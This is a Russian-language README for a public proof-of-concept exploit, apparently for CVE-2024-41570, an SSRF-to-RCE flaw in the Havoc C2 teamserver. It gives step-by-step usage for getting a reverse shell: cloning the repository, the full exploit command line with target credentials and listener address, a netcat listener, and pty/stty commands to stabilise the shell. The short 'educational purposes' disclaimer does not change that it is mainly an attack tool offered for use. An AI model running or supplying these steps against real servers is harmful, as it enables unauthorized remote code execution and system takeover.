
Автоматизированный эксплойт Reverse Shell через WebSocket | Havoc-C2-SSRF с RCE
Этот проект содержит proof-of-concept (PoC) скрипт на Python для эксплуатации уязвимого сервиса на основе WebSocket. Скрипт автоматизирует регистрацию агента, доставку WebSocket-пейлоада и удалённое выполнение команд для установления обратной оболочки (reverse shell).
pip install -r requirements.txt
git clone https://github.com/kit4py/CVE-2024-41570.git
cd CVE-2024-41570
pip install -r requirements.txt
Запустите скрипт с необходимыми аргументами:
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
-t: Целевой URL WebSocket-сервера.-i: IP-адрес Team Server из Havoc.-p: Порт Team Server из Havoc.-U: Имя пользователя для аутентификации WebSocket.-P: Пароль для аутентификации WebSocket.-l: IP-адрес слушателя (listener) для обратной оболочки (ваша машина).-L: Порт слушателя (listener) для обратной оболочки (ваша машина).python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
nc -lvnp <listener_port>
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
Скрипт требует следующие библиотеки Python:
requestspycryptodomeУстановите их с помощью команды:
pip install -r requirements.txt
Этот скрипт предназначен только для образовательных целей. Убедитесь, что у вас есть явное разрешение на тестирование целевой системы. Неправильное использование этого скрипта может нарушить законы и этические нормы.
Вдохновлено Default Havoc Poc
Вклад приветствуется! Не стесняйтесь форкать репозиторий и отправлять pull request.
Этот проект распространяется под лицензией MIT. Подробности см. в файле LICENSE.